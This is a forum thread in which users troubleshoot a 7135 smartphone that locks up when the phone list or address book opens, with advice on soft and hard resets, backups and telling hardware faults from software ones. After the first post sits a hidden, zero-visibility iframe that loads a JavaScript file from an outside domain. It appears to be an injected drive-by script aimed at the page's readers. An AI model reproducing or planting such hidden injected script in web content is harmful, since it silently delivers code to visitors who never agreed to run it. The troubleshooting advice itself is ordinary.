Lock up

Every time I try and get my phone list the phone completely locks up and the screen goes black.....I tried removing the back cover and reseting...It happens again as soon as I hit that button or try and get there from the menu.

Any suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

By "Phone List", do you mean "Address Book 4.0", that comes with the 7135?

Hmmm... I haven't had this happen at all on my 7135. Sorry to hear that.
I wonder if you can just reinstall it from somewhere?
Anyone?

Then again, that is a HUGE handicap since it is so central to dialing, etc.

If I were you I would exchange it if there is no easy anwer here.

Ooooh, :angel2 you did a soft reset, but a Hard Reset might just correct the problem. But just be sure that beforehand you sync/back up all your apps, as it will bring the phone back to the state it was in before you got it. But then you probably already knew that.

Sorry, just thinking out loud here.

Send a message via AIM to Beryl

You might want to see if it is HW or SW.
1. SW problem - Go to the Applications screen (from launcher) and select "Address" from there. If that works, then it is not the app. If it locks up, you have a software problem and may want to do a hard reset if you don't feel like debugging hacks or other things.

2. HW problem - Use Pref-PDA to remap the button to something that does work from the launcher. Press the button and if it locks up, it is a hardware problem. Get a replacement.

Obviously HW = Hardware
and SW = Software

Thought I'd translate just in case.

This scares me! I would hate to be traveling and have it happen.

You could always use "BackupBuddyVFS" to back up all your apps onto the SD card, so that if you have to do a hard reset while traveling, you can easily restore them.
